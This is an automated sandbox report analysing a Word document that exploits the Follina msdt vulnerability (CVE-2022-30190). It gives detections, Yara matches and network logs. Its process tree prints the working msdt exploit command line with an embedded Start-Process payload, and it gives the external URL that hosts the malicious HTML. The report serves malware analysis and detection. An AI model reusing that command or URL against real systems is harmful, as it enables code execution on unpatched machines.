Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
icRTA4gcSe.docx

Overview

General Information

Sample Name:icRTA4gcSe.docx
Analysis ID:685945
MD5:9873ccaccab0237bf533324f69dff3b3
SHA1:29d098d9ddf7e425413817089beb2eb14c91bc64
SHA256:05625644a2e070d4780822daf7126f408ec0db9881a9995dc24ee500b624a198
Infos:

Detection

Follina CVE-2022-30190
Score:92
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Antivirus / Scanner detection for submitted sample
Yara detected Microsoft Office Exploit Follina CVE-2022-30190
Antivirus detection for dropped file
Detected suspicious Microsoft Office reference URL
Contains an external reference to another file
Document exploit detected (process start blacklist hit)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
JA3 SSL client fingerprint seen in connection with other malware
Found dropped PE file which has not been started or loaded
Potential document exploit detected (performs DNS queries)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
PE file does not import any functions
Potential document exploit detected (unknown TCP traffic)
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Compiles C# or VB.Net code
Potential document exploit detected (performs HTTP gets)
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64
  • WINWORD.EXE (PID: 5740 cmdline: "C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE" /Automation -Embedding MD5: 0B9AB9B9C4DE429473D6450D4297A123)
    • MSOSYNC.EXE (PID: 5992 cmdline: C:\Program Files (x86)\Microsoft Office\Office16\MsoSync.exe MD5: EA19F4A0D18162BE3A0C8DAD249ADE8C)
    • msdt.exe (PID: 5556 cmdline: C:\Windows\system32\msdt.exe" ms-msdt:/id PCWDiagnostic /skip force /param "IT_RebrowseForFile=cal?c IT_LaunchMethod=ContextMenu IT_SelectProgram=NotListed IT_BrowseForFile=h$(Start-Process('calc'))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe IT_AutoTroubleshoot=ts_AUTO MD5: 7F0C51DBA69B9DE5DDF6AA04CE3A69F4)
  • csc.exe (PID: 7104 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\5pliokiz\5pliokiz.cmdline MD5: 350C52F71BDED7B99668585C15D70EEA)
    • cvtres.exe (PID: 2008 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES329A.tmp" "c:\Users\user\AppData\Local\Temp\5pliokiz\CSCEC77468AE1504898A4CAD2F9B69D7F46.TMP" MD5: C09985AE74F0882F208D75DE27770DFA)
  • csc.exe (PID: 3228 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\h34ip5a5\h34ip5a5.cmdline MD5: 350C52F71BDED7B99668585C15D70EEA)
    • cvtres.exe (PID: 5020 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES48B3.tmp" "c:\Users\user\AppData\Local\Temp\h34ip5a5\CSC3AC1B580675E4658855F5C63BDA7A47F.TMP" MD5: C09985AE74F0882F208D75DE27770DFA)
  • calc.exe (PID: 1648 cmdline: "C:\Windows\system32\calc.exe" MD5: 0975EE4BD09E87C94861F69E4AA44B7A)
  • Calculator.exe (PID: 3020 cmdline: "C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1712.10601.0_x64__8wekyb3d8bbwe\Calculator.exe" -ServerName:App.AppXsm3pg4n7er43kdh1qp4e79f1j7am68r8.mca MD5: 79DAE866D55C1BA452E1B19721F67C1F)
  • csc.exe (PID: 5640 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\v2wr4cux\v2wr4cux.cmdline MD5: 350C52F71BDED7B99668585C15D70EEA)
    • cvtres.exe (PID: 6760 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESEEE6.tmp" "c:\Users\user\AppData\Local\Temp\v2wr4cux\CSCB2D03E94AB5B4EC2978640D7F4BF95DE.TMP" MD5: C09985AE74F0882F208D75DE27770DFA)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
document.xml.relsSUSP_Doc_WordXMLRels_May22Detects a suspicious pattern in docx document.xml.rels file as seen in CVE-2022-30190 / Follina exploitationTobias Michalski, Christian Burkard, Wojciech Cieslak
  • 0x39:$a1: <Relationships
  • 0x2e5:$a2: TargetMode="External"
  • 0x2dd:$x1: .html!
document.xml.relsINDICATOR_OLE_RemoteTemplateDetects XML relations where an OLE object is refrencing an external target in dropper OOXML documentsditekSHen
  • 0x26e:$olerel: relationships/oleObject
  • 0x287:$target1: Target="http
  • 0x2e5:$mode: TargetMode="External

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_FollinaYara detected Microsoft Office Exploit Follina / CVE-2022-30190Joe Security

    Dropped Files

    SourceRuleDescriptionAuthorStrings
    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\fb0f9c45-fb5f-4690-9815-e11a762d4739[1].htmSUSP_PS1_Msdt_Execution_May22Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitationNasreddine Bencherchali, Christian Burkard
    • 0x198f:$a: PCWDiagnostic
    • 0x1983:$sa3: ms-msdt
    • 0x1a02:$sb3: IT_BrowseForFile=
    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\fb0f9c45-fb5f-4690-9815-e11a762d4739[1].htmEXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitationTobias Michalski, Christian Burkard
    • 0x1972:$re1: location.href = "ms-msdt:
    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\fb0f9c45-fb5f-4690-9815-e11a762d4739[1].htmJoeSecurity_FollinaYara detected Microsoft Office Exploit Follina / CVE-2022-30190Joe Security
      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\3A694E5B.htmSUSP_PS1_Msdt_Execution_May22Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitationNasreddine Bencherchali, Christian Burkard
      • 0x198f:$a: PCWDiagnostic
      • 0x1983:$sa3: ms-msdt
      • 0x1a02:$sb3: IT_BrowseForFile=
      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\3A694E5B.htmEXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitationTobias Michalski, Christian Burkard
      • 0x1972:$re1: location.href = "ms-msdt:
      Click to see the 4 entries

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      0000000C.00000002.568294017.0000000000A00000.00000004.00000020.00020000.00000000.sdmpSUSP_PS1_Msdt_Execution_May22Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitationNasreddine Bencherchali, Christian Burkard
      • 0x28b2:$a: PCWDiagnostic
      • 0x2888:$sa1: msdt.exe
      • 0x289a:$sa3: ms-msdt
      • 0x2994:$sb3: IT_BrowseForFile=
      0000000C.00000002.568294017.0000000000A00000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_FollinaYara detected Microsoft Office Exploit Follina / CVE-2022-30190Joe Security
        0000000C.00000002.559095546.0000000000718000.00000004.00000020.00020000.00000000.sdmpSUSP_PS1_Msdt_Execution_May22Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitationNasreddine Bencherchali, Christian Burkard
        • 0x5f16:$a: PCWDiagnostic
        • 0xb6b6:$a: PCWDiagnostic
        • 0x17f2c:$a: PCWDiagnostic
        • 0x57b0:$sa1: msdt.exe
        • 0x1a8a6:$sa1: msdt.exe
        • 0x26b8:$sb3: IT_BrowseForFile=
        0000000C.00000002.558367025.0000000000520000.00000004.00000020.00020000.00000000.sdmpSUSP_PS1_Msdt_Execution_May22Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitationNasreddine Bencherchali, Christian Burkard
        • 0x2338:$a: PCWDiagnostic
        • 0x22d0:$sa1: msdt.exe
        • 0x230c:$sa1: msdt.exe
        • 0x2568:$sa1: msdt.exe
        • 0x2320:$sa3: ms-msdt
        • 0x241c:$sb3: IT_BrowseForFile=
        0000000C.00000002.558367025.0000000000520000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_FollinaYara detected Microsoft Office Exploit Follina / CVE-2022-30190Joe Security
          Click to see the 3 entries

          Sigma Signatures

          No Sigma rule has matched

          Snort Signatures

          No Snort rule has matched

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Multi AV Scanner detection for submitted file
          Source: icRTA4gcSe.docxVirustotal: Detection: 47%Perma Link
          Source: icRTA4gcSe.docxMetadefender: Detection: 28%Perma Link
          Source: icRTA4gcSe.docxReversingLabs: Detection: 61%
          Antivirus / Scanner detection for submitted sample
          Source: icRTA4gcSe.docxAvira: detected
          Antivirus detection for dropped file
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\3903F105.htmAvira: detection malicious, Label: JS/CVE-2022-30190.G
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\fb0f9c45-fb5f-4690-9815-e11a762d4739[1].htmAvira: detection malicious, Label: JS/CVE-2022-30190.G
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\3A694E5B.htmAvira: detection malicious, Label: JS/CVE-2022-30190.G

          Exploits

          barindex
          Yara detected Microsoft Office Exploit Follina CVE-2022-30190
          Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
          Source: Yara matchFile source: 0000000C.00000002.568294017.0000000000A00000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.558367025.0000000000520000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.558856728.0000000000710000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\fb0f9c45-fb5f-4690-9815-e11a762d4739[1].htm, type: DROPPED
          Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\3A694E5B.htm, type: DROPPED
          Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\3903F105.htm, type: DROPPED
          Detected suspicious Microsoft Office reference URL
          Source: document.xml.relsExtracted files from sample: https://sqdocs.s3.eu-west-2.amazonaws.com/fb0f9c45-fb5f-4690-9815-e11a762d4739.html!
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dll
          Source: unknownHTTPS traffic detected: 52.95.148.198:443 -> 192.168.2.3:49746 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 52.95.143.42:443 -> 192.168.2.3:49749 version: TLS 1.2

          Software Vulnerabilities

          barindex
          Document exploit detected (process start blacklist hit)
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess created: C:\Windows\SysWOW64\msdt.exe
          Source: global trafficDNS query: name: sqdocs.s3.eu-west-2.amazonaws.com
          Source: global trafficDNS query: name: sqdocs.s3.eu-west-2.amazonaws.com
          Source: global trafficTCP traffic: 192.168.2.3:49746 -> 52.95.148.198:443
          Source: global trafficTCP traffic: 52.95.148.198:443 -> 192.168.2.3:49746
          Source: global trafficTCP traffic: 192.168.2.3:49746 -> 52.95.148.198:443
          Source: global trafficTCP traffic: 192.168.2.3:49746 -> 52.95.148.198:443
          Source: global trafficTCP traffic: 52.95.148.198:443 -> 192.168.2.3:49746
          Source: global trafficTCP traffic: 52.95.148.198:443 -> 192.168.2.3:49746
          Source: global trafficTCP traffic: 192.168.2.3:49746 -> 52.95.148.198:443
          Source: global trafficTCP traffic: 192.168.2.3:49746 -> 52.95.148.198:443
          Source: global trafficTCP traffic: 52.95.148.198:443 -> 192.168.2.3:49746
          Source: global trafficTCP traffic: 52.95.148.198:443 -> 192.168.2.3:49746
          Source: global trafficTCP traffic: 192.168.2.3:49746 -> 52.95.148.198:443
          Source: global trafficTCP traffic: 52.95.148.198:443 -> 192.168.2.3:49746
          Source: global trafficTCP traffic: 52.95.148.198:443 -> 192.168.2.3:49746
          Source: global trafficTCP traffic: 192.168.2.3:49746 -> 52.95.148.198:443
          Source: global trafficTCP traffic: 192.168.2.3:49746 -> 52.95.148.198:443
          Source: global trafficTCP traffic: 52.95.148.198:443 -> 192.168.2.3:49746
          Source: global trafficTCP traffic: 192.168.2.3:49747 -> 52.95.148.198:443
          Source: global trafficTCP traffic: 52.95.148.198:443 -> 192.168.2.3:49747
          Source: global trafficTCP traffic: 192.168.2.3:49747 -> 52.95.148.198:443
          Source: global trafficTCP traffic: 192.168.2.3:49747 -> 52.95.148.198:443
          Source: global trafficTCP traffic: 52.95.148.198:443 -> 192.168.2.3:49747
          Source: global trafficTCP traffic: 52.95.148.198:443 -> 192.168.2.3:49747
          Source: global trafficTCP traffic: 192.168.2.3:49747 -> 52.95.148.198:443
          Source: global trafficTCP traffic: 52.95.148.198:443 -> 192.168.2.3:49747
          Source: global trafficTCP traffic: 192.168.2.3:49747 -> 52.95.148.198:443
          Source: global trafficTCP traffic: 52.95.148.198:443 -> 192.168.2.3:49747
          Source: global trafficTCP traffic: 52.95.148.198:443 -> 192.168.2.3:49747
          Source: global trafficTCP traffic: 52.95.148.198:443 -> 192.168.2.3:49747
          Source: global trafficTCP traffic: 192.168.2.3:49747 -> 52.95.148.198:443
          Source: global trafficTCP traffic: 192.168.2.3:49747 -> 52.95.148.198:443
          Source: global trafficTCP traffic: 52.95.148.198:443 -> 192.168.2.3:49747
          Source: global trafficTCP traffic: 192.168.2.3:49747 -> 52.95.148.198:443
          Source: global trafficTCP traffic: 52.95.148.198:443 -> 192.168.2.3:49747
          Source: global trafficTCP traffic: 192.168.2.3:49748 -> 52.95.148.198:443
          Source: global trafficTCP traffic: 52.95.148.198:443 -> 192.168.2.3:49748
          Source: global trafficTCP traffic: 192.168.2.3:49748 -> 52.95.148.198:443
          Source: global trafficTCP traffic: 192.168.2.3:49748 -> 52.95.148.198:443
          Source: global trafficTCP traffic: 52.95.148.198:443 -> 192.168.2.3:49748
          Source: global trafficTCP traffic: 52.95.148.198:443 -> 192.168.2.3:49748
          Source: global trafficTCP traffic: 192.168.2.3:49748 -> 52.95.148.198:443
          Source: global trafficTCP traffic: 52.95.148.198:443 -> 192.168.2.3:49748
          Source: global trafficTCP traffic: 192.168.2.3:49748 -> 52.95.148.198:443
          Source: global trafficTCP traffic: 52.95.148.198:443 -> 192.168.2.3:49748
          Source: global trafficTCP traffic: 52.95.148.198:443 -> 192.168.2.3:49748
          Source: global trafficTCP traffic: 192.168.2.3:49748 -> 52.95.148.198:443
          Source: global trafficTCP traffic: 192.168.2.3:49749 -> 52.95.143.42:443
          Source: global trafficTCP traffic: 52.95.143.42:443 -> 192.168.2.3:49749
          Source: global trafficTCP traffic: 192.168.2.3:49749 -> 52.95.143.42:443
          Source: global trafficTCP traffic: 192.168.2.3:49749 -> 52.95.143.42:443
          Source: global trafficTCP traffic: 52.95.143.42:443 -> 192.168.2.3:49749
          Source: global trafficTCP traffic: 52.95.143.42:443 -> 192.168.2.3:49749
          Source: global trafficTCP traffic: 192.168.2.3:49749 -> 52.95.143.42:443
          Source: global trafficTCP traffic: 192.168.2.3:49749 -> 52.95.143.42:443
          Source: global trafficTCP traffic: 52.95.143.42:443 -> 192.168.2.3:49749
          Source: global trafficTCP traffic: 52.95.143.42:443 -> 192.168.2.3:49749
          Source: global trafficTCP traffic: 192.168.2.3:49749 -> 52.95.143.42:443
          Source: global trafficTCP traffic: 192.168.2.3:49749 -> 52.95.143.42:443
          Source: global trafficTCP traffic: 52.95.143.42:443 -> 192.168.2.3:49749
          Source: global trafficTCP traffic: 52.95.143.42:443 -> 192.168.2.3:49749
          Source: global trafficTCP traffic: 52.95.143.42:443 -> 192.168.2.3:49749
          Source: global trafficTCP traffic: 192.168.2.3:49749 -> 52.95.143.42:443
          Source: global trafficTCP traffic: 52.95.143.42:443 -> 192.168.2.3:49749
          Source: global trafficTCP traffic: 192.168.2.3:49749 -> 52.95.143.42:443
          Source: global trafficTCP traffic: 52.95.143.42:443 -> 192.168.2.3:49749
          Source: global trafficTCP traffic: 192.168.2.3:49749 -> 52.95.143.42:443
          Source: global trafficTCP traffic: 192.168.2.3:49749 -> 52.95.143.42:443
          Source: global trafficTCP traffic: 52.95.143.42:443 -> 192.168.2.3:49749
          Source: global trafficTCP traffic: 192.168.2.3:49750 -> 52.95.143.42:443
          Source: global trafficTCP traffic: 52.95.143.42:443 -> 192.168.2.3:49750
          Source: global trafficTCP traffic: 192.168.2.3:49750 -> 52.95.143.42:443
          Source: global trafficTCP traffic: 192.168.2.3:49750 -> 52.95.143.42:443
          Source: global trafficTCP traffic: 52.95.143.42:443 -> 192.168.2.3:49750
          Source: global trafficTCP traffic: 52.95.143.42:443 -> 192.168.2.3:49750
          Source: global trafficTCP traffic: 192.168.2.3:49750 -> 52.95.143.42:443
          Source: global trafficTCP traffic: 192.168.2.3:49750 -> 52.95.143.42:443
          Source: global trafficTCP traffic: 52.95.143.42:443 -> 192.168.2.3:49750
          Source: global trafficTCP traffic: 192.168.2.3:49750 -> 52.95.143.42:443
          Source: global trafficTCP traffic: 52.95.143.42:443 -> 192.168.2.3:49750
          Source: global trafficTCP traffic: 52.95.143.42:443 -> 192.168.2.3:49750
          Source: global trafficTCP traffic: 192.168.2.3:49750 -> 52.95.143.42:443
          Source: global trafficTCP traffic: 52.95.143.42:443 -> 192.168.2.3:49750
          Source: global trafficTCP traffic: 52.95.143.42:443 -> 192.168.2.3:49750
          Source: global trafficTCP traffic: 192.168.2.3:49750 -> 52.95.143.42:443
          Source: global trafficTCP traffic: 192.168.2.3:49750 -> 52.95.143.42:443
          Source: global trafficTCP traffic: 192.168.2.3:49750 -> 52.95.143.42:443
          Source: global trafficTCP traffic: 52.95.143.42:443 -> 192.168.2.3:49750
          Source: global trafficTCP traffic: 192.168.2.3:49750 -> 52.95.143.42:443
          Source: global trafficTCP traffic: 192.168.2.3:49750 -> 52.95.143.42:443
          Source: global trafficTCP traffic: 192.168.2.3:49751 -> 52.95.143.42:443
          Source: global trafficTCP traffic: 52.95.143.42:443 -> 192.168.2.3:49751
          Source: global trafficTCP traffic: 192.168.2.3:49751 -> 52.95.143.42:443
          Source: global trafficTCP traffic: 192.168.2.3:49751 -> 52.95.143.42:443
          Source: global trafficTCP traffic: 52.95.143.42:443 -> 192.168.2.3:49751
          Source: global trafficTCP traffic: 52.95.143.42:443 -> 192.168.2.3:49751
          Source: global trafficTCP traffic: 192.168.2.3:49751 -> 52.95.143.42:443
          Source: global trafficTCP traffic: 192.168.2.3:49751 -> 52.95.143.42:443
          Source: global trafficTCP traffic: 52.95.143.42:443 -> 192.168.2.3:49751
          Source: global trafficTCP traffic: 192.168.2.3:49751 -> 52.95.143.42:443
          Source: global trafficTCP traffic: 52.95.143.42:443 -> 192.168.2.3:49751
          Source: global trafficTCP traffic: 52.95.143.42:443 -> 192.168.2.3:49751
          Source: global trafficTCP traffic: 192.168.2.3:49751 -> 52.95.143.42:443
          Source: global trafficTCP traffic: 52.95.143.42:443 -> 192.168.2.3:49751
          Source: global trafficTCP traffic: 52.95.143.42:443 -> 192.168.2.3:49751
          Source: global trafficTCP traffic: 192.168.2.3:49751 -> 52.95.143.42:443
          Source: global trafficTCP traffic: 192.168.2.3:49751 -> 52.95.143.42:443
          Source: global trafficTCP traffic: 192.168.2.3:49751 -> 52.95.143.42:443
          Source: global trafficTCP traffic: 52.95.143.42:443 -> 192.168.2.3:49751
          Source: global trafficTCP traffic: 192.168.2.3:49751 -> 52.95.143.42:443
          Source: global trafficTCP traffic: 192.168.2.3:49751 -> 52.95.143.42:443
          Source: global trafficTCP traffic: 192.168.2.3:49752 -> 52.95.148.198:443
          Source: global trafficTCP traffic: 52.95.148.198:443 -> 192.168.2.3:49752
          Source: global trafficTCP traffic: 192.168.2.3:49752 -> 52.95.148.198:443
          Source: global trafficTCP traffic: 192.168.2.3:49752 -> 52.95.148.198:443
          Source: global trafficTCP traffic: 52.95.148.198:443 -> 192.168.2.3:49752
          Source: global trafficTCP traffic: 52.95.148.198:443 -> 192.168.2.3:49752
          Source: global trafficTCP traffic: 192.168.2.3:49752 -> 52.95.148.198:443
          Source: global trafficTCP traffic: 52.95.148.198:443 -> 192.168.2.3:49752
          Source: global trafficTCP traffic: 192.168.2.3:49752 -> 52.95.148.198:443
          Source: global trafficTCP traffic: 52.95.148.198:443 -> 192.168.2.3:49752
          Source: global trafficTCP traffic: 52.95.148.198:443 -> 192.168.2.3:49752
          Source: global trafficTCP traffic: 52.95.148.198:443 -> 192.168.2.3:49752
          Source: global trafficTCP traffic: 192.168.2.3:49752 -> 52.95.148.198:443
          Source: global trafficTCP traffic: 192.168.2.3:49752 -> 52.95.148.198:443
          Source: global trafficTCP traffic: 52.95.148.198:443 -> 192.168.2.3:49752
          Source: global trafficTCP traffic: 192.168.2.3:49753 -> 52.95.148.198:443
          Source: global trafficTCP traffic: 52.95.148.198:443 -> 192.168.2.3:49753
          Source: global trafficTCP traffic: 192.168.2.3:49753 -> 52.95.148.198:443
          Source: global trafficTCP traffic: 192.168.2.3:49753 -> 52.95.148.198:443
          Source: global trafficTCP traffic: 52.95.148.198:443 -> 192.168.2.3:49753
          Source: global trafficTCP traffic: 52.95.148.198:443 -> 192.168.2.3:49753
          Source: global trafficTCP traffic: 192.168.2.3:49753 -> 52.95.148.198:443
          Source: global trafficTCP traffic: 52.95.148.198:443 -> 192.168.2.3:49753
          Source: global trafficTCP traffic: 192.168.2.3:49753 -> 52.95.148.198:443
          Source: global trafficTCP traffic: 52.95.148.198:443 -> 192.168.2.3:49753
          Source: global trafficTCP traffic: 52.95.148.198:443 -> 192.168.2.3:49753
          Source: global trafficTCP traffic: 52.95.148.198:443 -> 192.168.2.3:49753
          Source: global trafficTCP traffic: 192.168.2.3:49753 -> 52.95.148.198:443
          Source: global trafficTCP traffic: 192.168.2.3:49753 -> 52.95.148.198:443
          Source: global trafficTCP traffic: 52.95.148.198:443 -> 192.168.2.3:49753
          Source: global trafficTCP traffic: 192.168.2.3:49753 -> 52.95.148.198:443
          Source: global trafficTCP traffic: 52.95.148.198:443 -> 192.168.2.3:49753
          Source: global trafficTCP traffic: 192.168.2.3:49754 -> 52.95.148.198:443
          Source: global trafficTCP traffic: 52.95.148.198:443 -> 192.168.2.3:49754
          Source: global trafficTCP traffic: 192.168.2.3:49754 -> 52.95.148.198:443
          Source: global trafficTCP traffic: 192.168.2.3:49754 -> 52.95.148.198:443
          Source: global trafficTCP traffic: 52.95.148.198:443 -> 192.168.2.3:49754
          Source: global trafficTCP traffic: 52.95.148.198:443 -> 192.168.2.3:49754
          Source: global trafficTCP traffic: 192.168.2.3:49754 -> 52.95.148.198:443
          Source: global trafficTCP traffic: 52.95.148.198:443 -> 192.168.2.3:49754
          Source: global trafficTCP traffic: 192.168.2.3:49754 -> 52.95.148.198:443
          Source: global trafficTCP traffic: 52.95.148.198:443 -> 192.168.2.3:49754
          Source: global trafficTCP traffic: 52.95.148.198:443 -> 192.168.2.3:49754
          Source: global trafficTCP traffic: 52.95.148.198:443 -> 192.168.2.3:49754
          Source: global trafficTCP traffic: 192.168.2.3:49754 -> 52.95.148.198:443
          Source: global trafficTCP traffic: 192.168.2.3:49754 -> 52.95.148.198:443
          Source: global trafficTCP traffic: 52.95.148.198:443 -> 192.168.2.3:49754
          Source: global trafficTCP traffic: 192.168.2.3:49755 -> 52.95.143.42:443
          Source: global trafficTCP traffic: 52.95.143.42:443 -> 192.168.2.3:49755
          Source: global trafficTCP traffic: 192.168.2.3:49755 -> 52.95.143.42:443
          Source: global trafficTCP traffic: 192.168.2.3:49755 -> 52.95.143.42:443
          Source: global trafficTCP traffic: 52.95.143.42:443 -> 192.168.2.3:49755
          Source: global trafficTCP traffic: 52.95.143.42:443 -> 192.168.2.3:49755
          Source: global trafficTCP traffic: 192.168.2.3:49755 -> 52.95.143.42:443
          Source: global trafficTCP traffic: 192.168.2.3:49755 -> 52.95.143.42:443
          Source: global trafficTCP traffic: 52.95.143.42:443 -> 192.168.2.3:49755
          Source: global trafficTCP traffic: 192.168.2.3:49755 -> 52.95.143.42:443
          Source: global trafficTCP traffic: 52.95.143.42:443 -> 192.168.2.3:49755
          Source: global trafficTCP traffic: 52.95.143.42:443 -> 192.168.2.3:49755
          Source: global trafficTCP traffic: 52.95.143.42:443 -> 192.168.2.3:49755
          Source: global trafficTCP traffic: 192.168.2.3:49755 -> 52.95.143.42:443
          Source: global trafficTCP traffic: 192.168.2.3:49755 -> 52.95.143.42:443
          Source: global trafficTCP traffic: 192.168.2.3:49755 -> 52.95.143.42:443
          Source: global trafficTCP traffic: 52.95.143.42:443 -> 192.168.2.3:49755
          Source: global trafficTCP traffic: 192.168.2.3:49755 -> 52.95.143.42:443
          Source: global trafficTCP traffic: 192.168.2.3:49755 -> 52.95.143.42:443
          Source: global trafficTCP traffic: 192.168.2.3:49756 -> 52.95.143.42:443
          Source: global trafficTCP traffic: 52.95.143.42:443 -> 192.168.2.3:49756
          Source: global trafficTCP traffic: 192.168.2.3:49756 -> 52.95.143.42:443
          Source: global trafficTCP traffic: 192.168.2.3:49756 -> 52.95.143.42:443
          Source: global trafficTCP traffic: 52.95.143.42:443 -> 192.168.2.3:49756
          Source: global trafficTCP traffic: 52.95.143.42:443 -> 192.168.2.3:49756
          Source: global trafficTCP traffic: 192.168.2.3:49756 -> 52.95.143.42:443
          Source: global trafficTCP traffic: 192.168.2.3:49756 -> 52.95.143.42:443
          Source: global trafficTCP traffic: 52.95.143.42:443 -> 192.168.2.3:49756
          Source: global trafficTCP traffic: 192.168.2.3:49756 -> 52.95.143.42:443
          Source: global trafficTCP traffic: 52.95.143.42:443 -> 192.168.2.3:49756
          Source: global trafficTCP traffic: 52.95.143.42:443 -> 192.168.2.3:49756
          Source: global trafficTCP traffic: 52.95.143.42:443 -> 192.168.2.3:49756
          Source: global trafficTCP traffic: 192.168.2.3:49756 -> 52.95.143.42:443
          Source: global trafficTCP traffic: 192.168.2.3:49756 -> 52.95.143.42:443
          Source: global trafficTCP traffic: 52.95.143.42:443 -> 192.168.2.3:49756
          Source: global trafficTCP traffic: 192.168.2.3:49756 -> 52.95.143.42:443
          Source: global trafficTCP traffic: 192.168.2.3:49756 -> 52.95.143.42:443
          Source: global trafficTCP traffic: 192.168.2.3:49757 -> 52.95.143.42:443
          Source: global trafficTCP traffic: 52.95.143.42:443 -> 192.168.2.3:49757
          Source: global trafficTCP traffic: 192.168.2.3:49757 -> 52.95.143.42:443
          Source: global trafficTCP traffic: 192.168.2.3:49757 -> 52.95.143.42:443
          Source: global trafficTCP traffic: 52.95.143.42:443 -> 192.168.2.3:49757
          Source: global trafficTCP traffic: 52.95.143.42:443 -> 192.168.2.3:49757
          Source: global trafficTCP traffic: 192.168.2.3:49757 -> 52.95.143.42:443
          Source: global trafficTCP traffic: 192.168.2.3:49757 -> 52.95.143.42:443
          Source: global trafficTCP traffic: 52.95.143.42:443 -> 192.168.2.3:49757
          Source: global trafficTCP traffic: 192.168.2.3:49757 -> 52.95.143.42:443
          Source: global trafficTCP traffic: 52.95.143.42:443 -> 192.168.2.3:49757
          Source: global trafficTCP traffic: 52.95.143.42:443 -> 192.168.2.3:49757
          Source: global trafficTCP traffic: 52.95.143.42:443 -> 192.168.2.3:49757
          Source: global trafficTCP traffic: 192.168.2.3:49757 -> 52.95.143.42:443
          Source: global trafficTCP traffic: 192.168.2.3:49757 -> 52.95.143.42:443
          Source: global trafficTCP traffic: 52.95.143.42:443 -> 192.168.2.3:49757
          Source: global trafficTCP traffic: 192.168.2.3:49757 -> 52.95.143.42:443
          Source: global trafficTCP traffic: 192.168.2.3:49757 -> 52.95.143.42:443
          Source: global trafficTCP traffic: 192.168.2.3:49758 -> 52.95.143.42:443
          Source: global trafficTCP traffic: 52.95.143.42:443 -> 192.168.2.3:49758
          Source: global trafficTCP traffic: 192.168.2.3:49758 -> 52.95.143.42:443
          Source: global trafficTCP traffic: 192.168.2.3:49758 -> 52.95.143.42:443
          Source: global trafficTCP traffic: 52.95.143.42:443 -> 192.168.2.3:49758
          Source: global trafficTCP traffic: 52.95.143.42:443 -> 192.168.2.3:49758
          Source: global trafficTCP traffic: 192.168.2.3:49758 -> 52.95.143.42:443
          Source: global trafficTCP traffic: 192.168.2.3:49758 -> 52.95.143.42:443
          Source: global trafficTCP traffic: 52.95.143.42:443 -> 192.168.2.3:49758
          Source: global trafficTCP traffic: 192.168.2.3:49758 -> 52.95.143.42:443
